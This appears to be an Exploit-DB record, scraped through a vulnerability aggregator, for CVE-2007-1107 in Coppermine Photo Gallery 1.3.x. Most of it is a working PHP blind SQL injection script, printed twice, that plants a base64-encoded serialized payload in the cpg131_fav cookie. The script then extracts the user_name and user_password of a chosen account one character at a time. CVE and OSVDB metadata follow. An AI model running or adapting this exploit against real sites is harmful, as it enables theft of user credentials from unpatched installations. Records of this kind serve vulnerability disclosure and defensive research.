ID EDB-ID:3371
Type exploitdb
Reporter s0cratex
Modified 2007-02-24T00:00:00
Description
Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit. CVE-2007-1107. Webapps exploit for php platform
<?
# Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit
# by s0cratex, RTM Member
# Visit: www.zonartm.org
/*
You need make a small work... Add a fav pic, enter to the site and add
/addfav.php?pid=2 for example..xD
... in the line: if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo
chr($i); break; } }
the word "download" depends of the language...
*/
# saludos a rgod, OpTix, crypkey 'n mechas...
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$host = "localhost"; $path = "/cpg"; $port = "80";
$id = "1";
echo "Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\n";
echo "--------------------------------------------------------------\n";
echo "\n";
echo "Username -> ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_name,".$j.",1))=".$x."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*";
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
$xpl = base64_encode($xpl);
$cnx = fsockopen($host,$port);
fwrite($cnx, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
while(!feof($cnx)){
if(eregi("download",fgets($cnx))){ $user.=chr($x); echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again..."); }
}
$j++;
}
echo "\n";
echo "Password -> ";
$a = 1; $pass = "";
while(!strstr($pass,chr(0))){
for($i=0;$i<255;$i++){
$xpl = "'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_password,".$a.",1))=".$i."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*";
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
$xpl = base64_encode($xpl);
$cnx2 = fsockopen($host,$port);
fwrite($cnx2, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
while(!feof($cnx2)){
if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; }
}
fclose($cnx2);
if ($i==255) {
die("\n Try again..."); }
}
$a++;
}
echo "--------------------------------------------------------------\n";
echo "s0cratex@zonartm.org || if you speak spanish->MSN: s0cratex@hotmail.com ..xD\n";
echo "www.zonartm.org/blog/s0cratex\n";
echo "plexinium.com comming soon <- Hacking Nica\n";
?>
# milw0rm.com [2007-02-24]
{"hash": "de863f2210df24338c114d74065a5d2d11b8d2ee8dccf454f52a47e511e8af71", "id": "EDB-ID:3371", "lastseen": "2016-01-31T18:19:48", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/3371/", "description": "Coppermine Photo Gallery 1.3.x Remote Blind SQL Injection Exploit. CVE-2007-1107. Webapps exploit for php platform", "title": "Coppermine Photo Gallery 1.3.x - Remote Blind SQL Injection Exploit", "sourceData": "<?\n# Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit\n# by s0cratex, RTM Member\n# Visit: www.zonartm.org\n\n/*\nYou need make a small work... Add a fav pic, enter to the site and add\n/addfav.php?pid=2 for example..xD\n... in the line: if(eregi(\"download\",fgets($cnx2))){ $pass.=chr($i); echo\nchr($i); break; } }\nthe word \"download\" depends of the language...\n*/\n\n# saludos a rgod, OpTix, crypkey 'n mechas...\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\n$host = \"localhost\"; $path = \"/cpg\"; $port = \"80\";\n$id = \"1\";\n\necho \"Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\\n\";\necho \"--------------------------------------------------------------\\n\";\necho \"\\n\";\necho \"Username -> \";\n$j = 1; $user = \"\";\nwhile(!strstr($user,chr(0))){\nfor($x=0;$x<255;$x++){\n$xpl = \"'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_name,\".$j.\",1))=\".$x.\"),1,0)) FROM cpg131_users WHERE user_id=\".$id.\")/*\";\n$xpl = \"a:1:{i:0;s:\".strlen($xpl).\":\\\"\".$xpl.\"\\\";}\";\n$xpl = base64_encode($xpl);\n$cnx = fsockopen($host,$port);\nfwrite($cnx, \"GET \".$path.\"/thumbnails.php?album=favpics HTTP/1.0\\r\\nCookie: cpg131_fav=\".$xpl.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx)){\nif(eregi(\"download\",fgets($cnx))){ $user.=chr($x); echo chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\"); }\n}\n$j++;\n}\necho \"\\n\";\necho \"Password -> \";\n$a = 1; $pass = \"\";\nwhile(!strstr($pass,chr(0))){\nfor($i=0;$i<255;$i++){\n$xpl = \"'') OR 1=(SELECT (IF((ASCII(SUBSTRING(user_password,\".$a.\",1))=\".$i.\"),1,0)) FROM cpg131_users WHERE user_id=\".$id.\")/*\";\n$xpl = \"a:1:{i:0;s:\".strlen($xpl).\":\\\"\".$xpl.\"\\\";}\";\n$xpl = base64_encode($xpl);\n$cnx2 = fsockopen($host,$port);\nfwrite($cnx2, \"GET \".$path.\"/thumbnails.php?album=favpics HTTP/1.0\\r\\nCookie: cpg131_fav=\".$xpl.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx2)){\nif(eregi(\"download\",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; }\n}\nfclose($cnx2);\nif ($i==255) {\ndie(\"\\n Try again...\"); }\n}\n$a++;\n}\necho \"--------------------------------------------------------------\\n\";\necho \"s0cratex@zonartm.org || if you speak spanish->MSN: s0cratex@hotmail.com ..xD\\n\";\necho \"www.zonartm.org/blog/s0cratex\\n\";\necho \"plexinium.com comming soon <- Hacking Nica\\n\";\n?>\n\n# milw0rm.com [2007-02-24]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-1107"], "published": "2007-02-24T00:00:00", "osvdbidlist": ["33133"], "references": [], "reporter": "s0cratex", "modified": "2007-02-24T00:00:00", "href": "https://www.exploit-db.com/exploits/3371/"}
{"result": {"cve": [{"id": "CVE-2007-1107", "type": "cve", "title": "CVE-2007-1107", "description": "SQL injection vulnerability in thumbnails.php in Coppermine Photo Gallery (CPG) 1.3.x allows remote authenticated users to execute arbitrary SQL commands via a cpg131_fav cookie. NOTE: it was later reported that 1.4.10, 1.4.14, and other 1.4.x versions are also affected using similar cookies.", "published": "2007-02-26T12:28:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1107", "cvelist": ["CVE-2007-1107"], "lastseen": "2017-10-11T11:07:01"}], "osvdb": [{"id": "OSVDB:33133", "type": "osvdb", "title": "Coppermine Photo Gallery thumbnails.php cpg131_fav Cookie Parameter SQL Injection", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0469.html\nISS X-Force ID: 32688\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3371\n[CVE-2007-1107](https://vulners.com/cve/CVE-2007-1107)\nBugtraq ID: 22709\n", "published": "2007-02-24T07:19:32", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:33133", "cvelist": ["CVE-2007-1107"], "lastseen": "2017-04-28T13:20:29"}]}}
